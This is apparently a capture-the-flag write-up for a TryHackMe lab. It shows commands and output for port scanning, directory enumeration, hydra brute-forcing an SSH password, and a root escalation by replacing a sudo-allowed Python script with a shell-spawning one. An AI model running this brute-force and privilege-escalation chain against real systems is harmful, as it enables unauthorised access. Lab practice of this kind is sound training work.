Open5

[TryHackMe]Library

kenryokenryo

https://tryhackme.com/r/room/bsidesgtlibrary

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --min-rate 5000 $IP                                                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 00:33 JST
Warning: 10.10.57.63 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.57.63
Host is up (0.26s latency).
Not shown: 40893 closed tcp ports (conn-refused), 24640 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.22 seconds
                                                                                                                
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q 
Error: error on running gobuster: unable to connect to http://10.10.57.63:8080/: Get "http://10.10.57.63:8080/": dial tcp 10.10.57.63:8080: connect: connection refused
                                                                                                                
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q  
Error: required flag(s) "wordlist" not set
                                                                                                                
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q 
/images               (Status: 301) [Size: 311] [--> http://10.10.57.63/images/]
/server-status        (Status: 403) [Size: 299]
kenryokenryo
┌──(kali㉿kali)-[~]
└─$ hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 02:03:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.57.63:22/
[STATUS] 152.00 tries/min, 152 tries in 00:01h, 14344248 to do in 1572:51h, 15 active
[22][ssh] host: 10.10.57.63   login: meliodas   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-16 02:05:46
kenryokenryo
┌──(kali㉿kali)-[~]
└─$ ssh meliodas@$IP 
meliodas@10.10.57.63's password: 
Permission denied, please try again.
meliodas@10.10.57.63's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py  user.txt
meliodas@ubuntu:~$ cat user.txt 
xxxxx
meliodas@ubuntu:~$ cat bak.py 
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
kenryokenryo
meliodas@ubuntu:~$ ll
total 40
drwxr-xr-x 4 meliodas meliodas 4096 Aug 24  2019 ./
drwxr-xr-x 3 root     root     4096 Aug 23  2019 ../
-rw-r--r-- 1 root     root      353 Aug 23  2019 bak.py
-rw------- 1 root     root       44 Aug 23  2019 .bash_history
-rw-r--r-- 1 meliodas meliodas  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 meliodas meliodas 3771 Aug 23  2019 .bashrc
drwx------ 2 meliodas meliodas 4096 Aug 23  2019 .cache/
drwxrwxr-x 2 meliodas meliodas 4096 Aug 23  2019 .nano/
-rw-r--r-- 1 meliodas meliodas  655 Aug 23  2019 .profile
-rw-r--r-- 1 meliodas meliodas    0 Aug 23  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 meliodas meliodas   33 Aug 23  2019 user.txt
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
kenryokenryo
meliodas@ubuntu:~$ rm bak.py 
rm: remove write-protected regular file 'bak.py'? y
meliodas@ubuntu:~$ nano bak.py 
meliodas@ubuntu:~$ cat bak.py 
import pty
pty.spawn("/bin/sh")
meliodas@ubuntu:~$ sudo python bak.py 
[sudo] password for meliodas: 
Sorry, user meliodas is not allowed to execute '/usr/bin/python bak.py' as root on ubuntu.
meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py 
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
xxx